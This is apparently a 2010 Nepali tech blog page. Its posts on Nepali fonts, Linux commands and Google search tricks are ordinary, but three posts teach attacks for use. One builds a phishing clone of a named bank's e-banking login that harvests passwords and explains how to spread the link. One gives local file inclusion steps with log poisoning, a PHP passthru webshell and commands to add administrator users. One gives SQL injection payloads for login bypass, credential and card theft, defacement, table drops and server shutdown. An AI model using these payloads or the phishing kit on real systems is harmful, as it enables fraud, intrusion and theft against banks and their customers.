Thursday, 14 October 2010

Two New Online Tools From Tech Gaun

I was getting bored with no task to do at home and thought of adding some features to the blog and came up with two new features.

The first feature is unicode nepali converter and this can be used to convert romanized nepali typed in english to unicode nepali.
Unicode Nepali Converter
The second feature is the converter that's capable of converting Bikram sambat(nepali date) to english A.D. and vice-versa.
Bikram Sambat to A.D & Vice-versa Converter

Hope you like these features. Have fun. :)


Download Nepali Fonts [Collection of few Nepali fonts]

If you are looking for some fonts, I've uploaded them for you.

This font pack includes Bharatvani Wide Font, Devanagari New, Himalb, HindiSanskrit, Kanchan, Kantipur, MtEverest, Rukmini, and Sagarmatha. If you need any other fonts and if you can't find through google search, drop the comment here and I will be finding them for you.

Download Nepali Fonts Pack

Hope this helps you. :)


Online Unicode Nepali to Kantipur/Preeti Converter

For some strange reason (or due to my unfamiliarity with Scribus), Scribus didn't show the Unicode Nepali text from story editor to the text frame so I searched for the online tool that would convert nepali unicode to the nepali fonts like kantipur or preeti. On doing the google search, I found an online tool that would do this task and I thought to share this with you guys.

In order to access the service, you can visit HERE.

Edit: The above link has been updated and another page has been referred to us in the comment.

NepalBhasa Converter, suggested in the comment section.

Hope you find this useful. Have fun :)


Wednesday, 13 October 2010

Making a fake login page [tutorial on phishers for beginners]

This tutorial will give you basic idea of what phishers are and how to create a simple phisher. Please be sure to comment on this post.

A phisher is a fake login page used to gain access to someones account. When someone logs into
the fake login page, there password is sent to you in some way such as by email or by writing to the files in the webserver. The major attacks of the phishing are the email accounts and e-commerce sites so this method is widely used to steal the critical information from the users.

Now, I'll show you how to make a successful phisher by giving an example by creating the phishing page of e-Banking of Nepal Investment Bank Limited.
a) We open the login page of our target site and save the page in our HDD by going to File->Save As from Firefox.

b) You'll have a HTML page and the folder containing the required images, css and javascript files for the HTML page.

c) Create a file like passes.txt or whatever where you'll store all the passwords from the phishing page. Note that you'll have to chmod this file to writable(like chmod a+w filename or chmod 777 filename according to the permission you want).

d) Now create a PHP file called phisher.php and paste the code below:

$fp = fopen("passes.txt","a");

foreach ($_REQUEST as $var => $val)
    fwrite($fp, $var." = ".$val."\r\n");

e) Your phishing PHP script is ready. Now time for editing the HTML source of your target login page. Open the HTML source in text editor and search for the text <form in my case(&usually) and in the action field specify the name of your PHP script like:

<form action="phisher.php" method="POST" name="RetailSignOn">

f) Now, our phisher is ready and all you have to do is upload the phisher.php and the HTML source and its related folder to free webhosting (I use Be sure to create passes.txt and set proper permission in the webserver.

g) Now, all you have to do is send the link of your phisher to the users by emailing, forum boards, XSS methods or by RTLO spoofing or any other method you can work creatively.

Now, if you want to stop these phishers, you might want to submit the phisher links you find on the internet to

I hope you learn something from this phishing tutorial. Have fun. :)


Comparing two files under LINUX [Basic Linux Command - Part II]

In this post, I am going to introduce you the methods of comparing two files in LINUX and is the second article on the basic linux commands following the previous post.

For comparing two files, we can follow two step task. The first step would be counting the number of lines, words and characters in the two files. After this, we would be interested to check the difference in the lines.

We use wc command to find the newline(giving count for number of lines), word and byte counts for the specified file (or the standard input if any file is not specified.

Let me take an example of the following test.c file on which I will perform wc command.


#include <stdio.h>
int main (int argc, char *argv[])
    return 0;

samar@samar-laptop:~/Desktop$ wc test.c
6 13 88 test.c

So this file contains 6 lines, 13 words and 88 characters (actually bytes).
You can specify the multiple files at once with this command such as:

samar@samar-laptop:~/Desktop$ wc test.c test.cpp
6 13 88 test.c
9 18 112 test.cpp
15 31 200 total

This way, you can calculate and compare the lines, words and characters count between two files. Now, we will look on the way of comparing files line by line and seeing the difference in the line.

The diff command allows us to display the line-by-line difference between two files.

Lets view the content of two files 1.txt and 2.txt, then we will be issuing diff command to see the difference between these files line-by-line.

samar@samar-laptop:~/Desktop$ cat 1.txt
samar dhwoj acharya

samar@samar-laptop:~/Desktop$ cat 2.txt
saurya dhwoj acharya
my brother

samar@samar-laptop:~/Desktop$ diff 1.txt 2.txt
< samar dhwoj acharya
> saurya dhwoj acharya
> my brother

In the output, the lines in first file are identified with less than sign and lines in the second file are identified with greater than sign. This is how you can see the lines where two files differ with each other. Further, we have sdiff command which will allow you to merge the file differences side by side and view the differences easily. I'll let you explore this command on your own. Also, if you want case-independent comparison with diff command, you can use -i parameter.

Also, I would be more than happy if you try to learn other commands such as cmp on your own.

Hope you learn something from this. Have fun and Happy Vijaya Dashami. :)


Tuesday, 12 October 2010

Download the Nepali songs from

This might be a minor hack but for some nepali music fans, it can be a great honeypot. I didn't see any option in the webpages to download the nepali mp3 songs available at so had to go with the alternative way when I needed to download tapoban maajha song of Jagadish Samal from this site.

For downloading mp3s from this site, you'll need to install the Downloadhelper firefox addon which I've already discussed in this blog.

Now after you downloaded this addon, go to NepaliCollection Music page and select among the artists available in the artists tab. After selecting the artists, you'll reach to the page with all the songs of that artist.

Now you can select the song you want to download and when you click on play selected option, the Downloadhelper icon will start to animate. Now click on that icon and you will be able to save the MP3 that is currently playing. This site has some really old songs too and the songs that you can't find usually. So its worth trying this trick.

Edit*: The site is vulnerable to SQL injection, maybe I might be writing some PHP script to easily give the download link of any MP3 the user wants to download. Needs some research over the vuln in the site, though.

Have fun with this trick. :)


विजय दशमीको मनगलमय शुभकामना सम्पूर्ण नेपालीलाई [Happy Dashain]

नेपालीहरुको महान पर्ब बिजया दशमीको मंगलमय शुभकामना techgaun को तर्फ बाट। यो महान पर्ब को अवसरमा हजुरहरु सम्पूर्णको जीवनमा खुशीयाली छाओस हाम्रो येही छ कामना.
तपाईंको समय राम्रो सँग बितोस येही छ हाम्रो चाहना

Happy dashain once again. :)


Monday, 11 October 2010

Installing .deb package in ubuntu with dpkg

You can use dpkg, a command line tool to manage the packages, in order to install .deb packages in your ubuntu linux distro.

dpkg is a tool to install, build, remove and manage Debian packages. The primary and more user-friendly front-end for dpkg is aptitude. dpkg itself is controlled entirely via command line parameters, which consist of exactly one action and zero or more options. The action-parameter tells dpkg what to do and options control the behavior of the action in some way.

In order to install the .deb package, you need to use -i parameter with the dpkg command as below:

cd /home/samar/Downloads/

sudo dpkg -i skype-ubuntu-intrepid_2.1.0.81-1_amd64.deb

Also, you can install the multiple packages directly by issuing the command as below:

cd /home/samar/Downloads/

sudo dpkg -i *.deb

Hope this helps you. :)


Sunday, 10 October 2010

Send Free SMS all over the World with

Searching for the online portal that you can use to send SMS to anyone and anywhere in the world? I found the solution for it. from Venista Group offers a free service to send SMS all over the world. The best part of this service is it allows you to send unlimited number of characters in your SMS.

When you sign up, you'll have to enter the valid phone number where you will be sent the link for completing the registration. After completing the registration, you'll be able to send SMS to whoever and wherever you want.

The only thing that might not be desirable for many is the small ad at the end but the service is worth using.

Go to

Please if you try(or have already tried) the service, please comment on this post so that it will be useful for others.


Saturday, 9 October 2010

Online Cool ASCII Generator from Network-Science.De

While googling for the online ascii generator tools, I came across a very useful site with number of fonts and other options to use in order to create cool ASCII of our texts.

__                .__     
_/  |_  ____   ____ |  |__  
\   __\/ __ \_/ ___\|  |  \ 
 |  | \  ___/\  \___|   Y  \
 |__|  \___  >\___  >___|  /
           \/     \/     \/ 
   _________   __ __  ____  
  / ___\__  \ |  |  \/    \ 
 / /_/  > __ \|  |  /   |  \
 \___  (____  /____/|___|  /
/_____/     \/           \/

Online ASCII Generator @ Network-Science.De

I found another website for the same purpose.

Have fun. :)


Get Matrix like Text Effect for Website Headers with

If you want the image with matrix like text effect for your blog or any other site/profile, you can now get it online.

Just type the text you want to appear in the image and choose from the various available options and on one single click, you will get image with the matrix text effect containing text you inputted.

What the official site says:

Matrix Text for websites and myspace. Create the matrix text effect or any text effect using the real matrix text characters. Generate free matrix text for MySpace or any other website and enchance your MySpace matrix layout. Our matrix text maker will provide matrix text HTML for free and it's fun to use. Our matrix text generator codes are used for everything. We take pride in our matrix text graphics! Say Happy Birthday with a Matrix Text! Quickly create personalized matrix text pictures to use anywhere.

Matrix Text Effect for Tech Gaun

Visit the site

They say they give HTML but you can directly save the image. Choose among the animation speed, color, font, etc. and get the Matrix Text effect as you need. Have fun. :)


Searching flash games using Google Search trick

Another google trick, this can be used to search any flash games(swf files) you want to play.

So you just played a flash game which was really cool and you want to download it in your computer? You can use google's search trick to search for any flash game you want.
This trick relies on the way directory listing is done in the webserver's directories. Whenever the default index page or directory listing denying features are not implemented in the web server, we can view the files in the directory. I'm not going into the further detail of this, instead I'm going to show you how to perform the google search for finding whatever flash game you want.

I need the game called gravity which is very fun to play. Now I do the search as below to find it:

"index of /" "last modified" "parent directory" swf gravity

You can replace the gravity with the name of the flash game you want to search and download.

Have fun with this google trick. :)


Searching PDFs and DOCs using Google Search

Generally, we use Google search in order to find any information we need. Google is widely used by many of us to find information relevant for us. Sometimes, we may need to find PDF (Portable Document Format) or DOC files and even the PPT (Powerpoint Presentations). This can be easily done using google search trick.

In order to find any type of file in google, we can use special google keyword filetype to specify the type of file we want to search. Put the colon : after the filetype and specify the type of file you want. For example, if you are searching for PDF or DOCs, do the following:



For example, you are searching for the PDFs related to nepali morphological analyzer, you'll do:

nepali morphological analyzer filetype:pdf

You can follow the same process for any other filetypes. Have fun with this google trick. :)


Thursday, 7 October 2010

Local File Inclusion [LFI] tutorial for beginners

Before, I have written an article on remote file inclusion (RFI) and this time, I am writing the article of LFI. So what is LFI? Its similar to RFI except that we are gonna include the file within the server rather than from another server. Sometimes, what happens is, we have allow_url_include setting is set to off on the webserver (On is by default) or there's somekind of filtration to check for things like http:// or www (though we can bypass these things). So in that condition, we may have to use LFI to own the server.

So lets again take example of vulnerable script:

    if (IsSet($_GET['page']))

Here we can see that the script doesn't check for which file to be included and hence, we are free to include any file by changing the 'page' GET variable value.

Lets put a quote at the end of URL and we see a pretty nice error like this:

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2

Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

So the script can't find the file profile.php' and hence errors. Now, lets try to include sensitive files that might be present in the webserver.

    Eg:    //boot.ini file in windoze
        http://localhost/test.php?page=../../windows/system32/drivers/etc/hosts        //hosts info file
        http://localhost/test.php?page=../../../../etc/passwd            //on Linux
        http://localhost/test.php?page=../../windows/repair/sam            //backup sam file
        etc. and etc.

    Two ../ shifts the current directory to two level down like cd../.. in command prompt. You may watch the error to find how many such dots you should use. But if you don't know how many such ../ you should use or don't want to waste time on finding how many steps you require, you may put enough such trails like about 10 to view these files like boot.ini or /etc/passwd as after reaching to the root folder like C:\, they can't go down anymore.

So you now know how to include sensitive files on the webserver. Now what if we need shell on the server.
Now, we throw some error to the logs of webserver that contain PHP code:
    <?php passthru($_GET['cmd']); ?> or something similar to this. There are functions like system(), shell_exec(), exec(), etc. offered by PHP for executing system level commands.

The problem on injecting malicious code to log files is that we either need to inject through telnet or using codes. I have seen many sites with the perl codes for the purpose. Search it.
What we do is inject the code to log files of apache such as access.log or apache_error.log or php_error.log or on any other log file. Then we include the same log file in the vulnerable script and then execute system commands.
    In my wampserver, I have:

        http://localhost/test.php?page=../logs/access.log   //for the log with site access infos.

There are various places you might want to watch and I'll be listing them at the end of tutorial.
Here I am gonna use telnet to throw the PHP code as error to the access.log file.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

Now this is gonna get saved in the file access.log in my webserver and now I include it in the vulnerable script:

    So we do:    http://localhost/test.php?page=../logs/access.log&cmd=dir    //lists the directory
    Now you may do any miserable works by writing cmd=any_system_level_commands like:
        ls -lia
        echo "HaCKeD BY sam207">index.*
        net user sam207 mypass /add
        net localgroup administrator sam207 /add

and any other commands you like.
This describes pretty much on owning the server. Now something extras I thought to include here:
    Some developers think that they can ensure the inclusion of only valid php file by doing something like below:

            if (IsSet($_GET['page']))

        // so looks like that it will include only the php files by ensuring the .php extension at the end. But if we add question mark (?) or nullbyte () by doing http://localhost/test.php?page=access.log, it would become something like:
                include("access.log.php");    //now the scripts leaves anything behind the nullbyte and the file access.log is successfully included. And you can carry your usual pwnage.
        Note that don't try to inject PHP code by sending malicious HTTP requests through your browser. It will be encoded and you won't be able to exploit.

Now finally the places you might want to watch on lfi:
You can find many other places to look after during your lfi by searching on the internet. Be creative and use your brain.
Hope you like it. Please comment it.
With Regards~


Complete MySQL Injection Tutorial for Beginners [SQLi tutorial]

This is the SQL injection tutorial written around two years ago when I was myself learning all sorts of hacking methodologies. I hope the beginners will have benefit from this sql injection tutorial. Enjoy reading this long article.




    #Checking for vulnerability
    #Find the number of columns
    #Addressing vulnerable part
    #Finding MySQL version
    #MySQL 5 or above injection
    #MySQL 4 injection

Greetz to all, I m sam207. In this tutorial, I will demonstrate the infamous MySQL injection in newbie perspective so that all the newbies become able to become successful SQL injector. But, be sure to check various php & mysql functions in various sites which will help you a lot... Also do not be harsh on me if there are any grammatical errors on the tutorial bcoz English is not my native language(I m from Nepal). Now lets begin our walkthrough of SQL injection.

Just general info.. Database is the application that stores a collection of data. Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties. DB may hold various critical informations like usernames, passwords, credit cares,etc. So, DB need to be secured but many DB servers running are insecured either bcoz of their vulnerability or bcoz of poor programming handles. To name few DB servers, MySQL(Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite, etc.

SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.
    In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. So lets head forward on our real walkthrough..

Suppose, a site has a login form & only the registered users are allowed to enter the site. Now, say u wanted to bypass the login and enter the site as the legitimate user. If the login script is not properly sanitized by the programmer, u may have luck to enter the site. U might be able to login into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection??
    Let's see an example, where the username admin with the password sam207 can login to the site. Suppose, the SQL query for this is carried out as below:
    SELECT USER from database WHERE username='admin' AND password='sam207'
And if above SELECT command evaluates true, user will be given access to the site otherwise not. Think what we could do if the script is not sanitized. This opens a door for the hackers to gain illegal access to the site.
In this example, the attacker can enter the following user data in the login form:
username:a or 1=1--
So, this would make our query as:
    SELECT USER from database WHERE username='a' or 1=1-- AND password=''
Note that -- is the comment operator and anything after it will be ignored as a comment. There exists another comment operator which is /*.
So our above query becomes:
    SELECT USER from database WHERE username='a' or 1=1
Now this query evaluates true even if there is no user called 'a' bcoz 1=1 is always true and using OR makes the query return true when one of the query is true. And this gives access to the site admin panel.
There can be various other username and password combinations to play with the vulnerable sites. U can create ur own new combinations for the site login.
Few such combinations are:
username:' or 1='1        password:' or 1='1
username:' or '1'='1'    password:' or '1'='1'
username:or 1=1        password:or 1=1
and there are many more cheat sheets. Just google. In fact, you can create your own such combinations to bypass logins..
That's all about bypassing logins.

SQL injection is not essentially done for bypassing logins only but it is also used for accessing the sensitive and secret data in the DB servers. This part is long, so I would be discussing in the subsections.

Sub-section 1:
Checking for vulnerability
Suppose, u got a site:
Now to check if it is vulnerable, u would simply add ' in the end i.e. where id variable is assigned.
So, it is:'
Now if the site is not vulnerable, it filters and the page loads normally.
But, if it doesn't filter the query string, it would give the error something like below:
"MySQL Syntax Error By '5'' In Article.php on line 15."
error that says us to check the correct MySQL version or MySQL Fetch error or sometimes just blank page. The error may be in any form. So it makes us sure that the site is vulnerable.
Also just using ' may not be the sure test; so you may try different things like: union select 1--
If you get error with this, you again come to know that its vulnerable... Just try different things..

Sub-section 2:
Find the number of columns
So, now its time to find the number of columns present. For this purpose, we will be using 'order by' until we get error.
That is, we make our URL query as: order by 1/*
    //this didn't give error.
    Now, I do increase it to 2. order by 2/*
    //still no error
    So, we need to increase until we get the error.
In my example, I got error when I put the value 3 i.e. order by 3/*
    //this gave me error.
So, it means there are 2 columns in the current table(3-1=2). This is how we find the number of columns.

Sub-section 3:
Addressing Vulnerable Part:
Now, we need to use union statement & find the column which we can replace so as to see the secret data on the page.
First lets craft the union statement which won't error.. This becomes like this: UNION ALL SELECT null/*
    This would error because our query needs to have one more null there.. Also null doesnot cause any type conversion error as it is just null..
    So for our injection, it becomes: UNION ALL SELECT null,null/*
For this we do: UNION ALL SELECT 1,2/*
Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. Note that the number may be displayed anywhere like in the title of the page or sometime even in the hidden tags in the source.. So, this means we can replace the number with our commands to display the private data the DB holds.
    In my example, 1 is seen on the page. This means, I should replace 1 with my thingsto proceed further. Got it??So lets move forward.
 Quick note: Sometime the numbers may not be displayed so it becomes hard for you to find the column which you can use to steal the data.. So in that case, you may try something like below: UNION ALL SELECT sam207,null/*
    or UNION ALL SELECT null,sam207/*

If sam207 is displayed somewhere in the page, you may go further for injection replacing the text part... Here, I have kept text instead of integer to check if text is displayed... Also, be sure to check source because sometimes they may be in some hidden tags..

Sub-section 4:
Finding MySQL version:
For our injection, it is necessary to find the MySQL version bcoz if it is 5, our job becomes lot easier. To check the version, there is a function @@version or version().
So, what we do is replace 1(which is the replaceable part) with @@version i.e. we do as below: UNION ALL SELECT @@version,2/*
    or UNION ALL SELECT version(),2/*
So, this would return the version of MySQL running on the server.
But, sometimes u may get error with above query. If that is the case, do use of unhex(hex()) function like this: ALL SELECT unhex(hex(@@version)),2/*
Remember that if u have to use unhex(hex()) function here, u will also have to use this function in the injection process later on.
@@version will give u the version. It may be either 4(or below) or 5 & above. I m now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection.

Quick note: Also, you may check for user, database,etc.. by using following: UNION ALL SELECT user(),2/* UNION ALL SELECT database(),2/*

Sub-section 5:
MySQL 5 or above injection:
Here, I m gonna show u how to access data in the server running MySQL 5 or above.
U got MySQL version 5.0.27 standard using the @@version in url parameter. MySQL from version 5 has a useful function called information_schema. This is table that holds information about the tables and columns present in the DB server. That is, it contains name of all tables and columns of the site.
For getting table list, we use: table_name from information_schema.tables
For getting column list, we use: column_name from information_schema.columns
So our query for getting the table list in our example would be: UNION ALL SELECT table_name,2 FROM information_schema.tables/*
And yeah if u had to use unhex(hex()) while finding version, u will have to do: UNION ALL SELECT unhex(hex(table_name)),2 FROM information_schema.tables/*
This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look the probable table with that information. U can even write down the table names for further reference and works. For my example, I would use the tbluser as the table that contains user & password.
Similarly, to get the column list, we would make our query as: UNION ALL SELECT column_name,2 FROM information_schema.columns/*
This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding these info. They are username and password respectively. So that's the column what I wanted. U have to search and check the columns until u get no error.
Alternatively to find the column in the specific table, u can do something like below: UNION ALL SELECT column_name,2 FROM information_schema.columns WHERE table_name='tbluser'
    This would display the columns present in the table tbluser. But this may not work always.
Let me show u how I got to know that the above two columns belong to table tbluser. Now let me show how to display the username and password stored in the DB.
There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using :(colon) in the hex form. Its hex value is 0x3a(thats zero at beginning not alphabet o.)
What I do is: UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
And this gives me the username and password like below:
Here the password is hashed and in this case, its MD5. Now u need to get the hash cracker like John The Ripper(, Cain & Able( and crack the hash. The hash may be different like SHA1, MD5,etc.. or sometimes plaintext password may be shown on the page. In this case, when I crack I get the password as sam207.
Now u get to admin login page and login as admin. Then u can do whatever u like. So that's all for the MySQL version 5.

Sub-section 6:
MySQL version 4 injection:
Now say ur victim has MySQL version 4. Then u won't be able to get the table name and column name as in MySQL version 5 bcoz it lacks support for information_schema.tables and information_schema.columns. So now u will have to guess the table name and column name until u do not get error. Also, if the mysql version is below 5, you may have to depend on the luck & error messages displayed.. Sometimes the error will give you the table name & column name & that gives you some idea to guess the correct table & columns name.. Say, the error reports sam207_article in the error.. So, you know that sam207_ is the prefix used in the table names...
Anyway, lets go for MySQL version 4 injection...
For example, u would do as below: UNION ALL SELECT 1,2 FROM user/*
Here, I guessed for the table name as user. But this gave me the error bcoz the table with the name user didn't exist on the DB. Now I kept on guessing for the table name until I didn't get error.
When I put the table name as tbluser, the page loaded normally. So I came to know that the table tbluser exists. UNION ALL SELECT 1,2 FROM tbluser/*
The page loaded normally. Now again u have to guess the column names present in the tbluser table.
I do something like below: UNION ALL SELECT user_name,2 FROM tbluser/*
    //this gave me error so there is no column with this name. UNION ALL SELECT username,2 FROM tbluser/*
    //It loaded the page normally along with the username from the table. UNION ALL SELECT pass,2 FROM tbluser/*
    //it errored so again the column pass doesnot exist in the table tbluser. UNION ALL SELECT password,2 FROM tbluser/*
    //the page loaded normally with password hash(or plaintext password).
Now u may do this: UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
This gave me:
On cracking, I got sam207 as password. Now I just need to login the site and do whatever I wanted.
Few table names u may try are: user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc. As said earlier, be sure to look on the errors because sometime they give fortunately for us the errors with table names & column names...

U may try these methods so as to get various data such as credit card numbers, social security numbers, etc. and etc. if the database holds. Just what u need to do is figure out the columns and get them displayed on the vulnerable page. That's all on the injection for accessing secret data.

Sometime, u find the vulnerable site and get evrything to know but maybe admin login doesn't exist or it is accessible for certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here.
Here, I will basically talk about few SQL commands u may use to change the site content. Therse commands are the workhorse of MySQL & are deadly when executed but good news for PHP/MySQL developer, stacked queries are not supported in PHP when using MySQL but can be used with MsSQL server.
First let me list these commands:
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
Now, u could have figured out that these commands can be very desctructive if the site lets us to interact with db with no sanitization & proper permission.
Command Usage:
UPDATE: Our vulnerable page is:
    Lets say the query is:
    SELECT title,data,author FROM article WHERE id=5
Though in reality, we don't know the query as above, we can find the table and column name as discussed earlier.
So we would do: UPDATE article SET title='Hacked By sam207'/*
    or, u could alternatively do: UPDATE article SET title='HACKED BY SAM207',data='Ur site has zero    

By executing first query, we have set the title value as 'Hacked By sam207' in the table article while in second query, we have updated all three fields title, data, & author in the table article.
Sometimes, u may want to change the specific page with id=5. For this u will do: UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
DELETE:As already stated, this deletes the content of one or more fields permanently from the db server.
The syntax is: DELETE title,data,author FROM article/*
    or if u want to delete these fields from the id=5, u will do: DELETE title,data,author FROM article WHERE id=5/*
DROP:This is another deadly command u can use. With this, u can delete a table & all its associated data.
For this, we make our URL as: DROP TABLE article/*
    This would delete table article & all its contents.

Finally, I want to say little about ;
Though I have not used this in my tutorial, u can use it to end ur first query and start another one.
This ; can be kept at the end of our first query so that we can start new query after it.

This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT;
So, you would craft a query which would execute the above command...
For example, in my case, I would do the following: SHUTDOWN WITH NOWAIT;
WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources...

MySQL has a function called load_file which you can use for your benefits again.. I have not seen much site where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc..
Do something like below: UNION ALL SELECT load_file('etc/passwd'),2/*

But sometimes, you will have to hex the part & do something like below: UNION ALL SELECT load_file(0x272F6574632F70617373776427)
    where I have hexed... Now, if we are lucky, the script would echo the etc/passwd in the result..

If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL..
For this, you will do: UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*

Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But has one to do it..

Below, I would list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server in your computer..
All the commands here are copy pasted from the post at & the credit for this part goes to the original author.. This is the only part which I didn't write myself.. I could have but since there is better one, I thought to put the same part here.. Thanks to whoever posted this in h4cky0u site.. & also full credits to him/her for this part..
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database

I know I have missed some things like outfile, WHERE clause, blind injection,etc... If I get time, I would try to update the tutorial with these.. Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you.. UNION ALL SELECT <script>alert("XSS via SQL injection");</script>,2/*
Again in the above injection, you may require to hex up the javascript part for bypassing the magic quotes..
Also for starters & those who know little things, you may setup a MySQL server & configure PHP for your apache server in your localhost where you can try different things..
In the command line interface of MySQL, try various commands enlisted below.. Try by modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP codes interact with MySQL server.. For example, install some free forums like PHPBB, SMF,etc.. or some content management system as it would help you in two ways.. First, you would learn how the PHP interacts with MySQL.. You may check MySQL folder with what changes has occured after installing them.. What would happen if I do this? or that?? etc..etc.. Second, you may be able to find bugs in them.. like rfi in some part of the code or sql injection in another part or maybe csrf injection,etc.. That would help you to learn new things because you all know practice makes the man perfect...

Greetz to all at darkmindz. Load of shoutz to pSyChO mOnkee and sToRm(U two guys rock) and all at GNY. Also greet to t0mmy9(Thanks for always helping me learn things) at
And hi to all my classmates bigyan musa, bhakunde sameer, gainda sandeep, joe haatti, dipesh bhedo, eman bhainsi, milan biralo, nikesh gandeula(Pheretima posthuma) & all my other classmates. Widout u guys, I m having boring days in my biology class. Hope to meet u all guys. And I wish bright future of u guys. Become successful doctors, engineers or whatever you wish to be..

THE END: With this, my tutorial which was mainly intended for newbies, ends here. I hope u liked my tutorial. I will hopefully write new tutorials in newbie concept after I learn myself all these things. Any comments can be dropped at samar_acharya[at]
And finally, read more and more, ask more and more and thats the best way to learn the things.
Keep Hacking & Enjoy It.

30 August, 2008


Download Helper - Download videos from youtube, facebook and almost any site

Today, I found a new mozilla addon that I can use to download any videos, audio and photo galleries easily from any site including but not limited to youtube, facebook, myspace, etc.

DownloadHelper is a tool for web content extraction. Its purpose is to capture video and image files from many sites.

Just surf the Web as you are used to, when DownloadHelper detects it can do something for you, the icon gets animated and a menu allows you to download files by simply clicking an item

For instance, if you go to a YouTube page, you'll be able to download the video directly on your file system. It also works with MySpace, Google videos, DailyMotion, Porkolt, iFilm, DreamHost and others.

Since version 3.1, you can setup the extension to automatically convert the downloaded movies to your preferred video format.

